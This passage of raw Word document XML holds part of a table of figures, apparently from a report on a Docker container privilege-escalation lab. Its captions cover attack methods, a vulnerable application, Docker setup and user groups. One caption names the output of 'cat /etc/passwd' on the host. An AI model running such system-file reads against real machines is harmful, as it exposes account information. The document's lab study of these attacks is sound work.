            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: the project plan.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858600 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AC43484" w14:textId="6AD0DBAF" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858601" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10: methods and techniques of the various attacks.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858601 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="441F65B9" w14:textId="2A453759" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858602" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Privilege escalation block diagram.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858602 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="038E45C6" w14:textId="5E0F419E" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858603" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12: network diagram of the connected containers.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858603 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04176F10" w14:textId="26FEA02A" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858604" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13: Network topology with the vulnerable application.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858604 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="120C59C9" w14:textId="3F998191" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858605" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14: Checking Ubuntu version.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858605 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EDD247F" w14:textId="579713D3" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858606" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15: installing Docker engine on the host machine.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858606 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04CE09FC" w14:textId="20DA8539" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858607" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16: verification Docker engine.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858607 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F61C71C" w14:textId="061B0122" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858608" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17: the laptop specifications.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858608 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="152070B7" w14:textId="5ECC69EA" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858609" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18: user created on the host machine.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858609 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1890D38E" w14:textId="751BE815" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858610" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19: output of cat /etc/passwd command on the host.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858610 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0710B579" w14:textId="6D2D9E90" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858611" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20: output of sudo visudo.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858611 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="270E8FFE" w14:textId="74C39629" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858612" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21: user added to the Docker group.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858612 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74B6BD1D" w14:textId="0143C91A" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858613" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22: output of the getent group command.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858613 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21820A6E" w14:textId="3C5BD8FB" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858614" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 23: creating file directory for the attacker.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858614 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14D6F268" w14:textId="3BE1E096" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858615" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00185B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 24: creating the Dockerfile.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858615 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="151E4E75" w14:textId="2A936D93" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
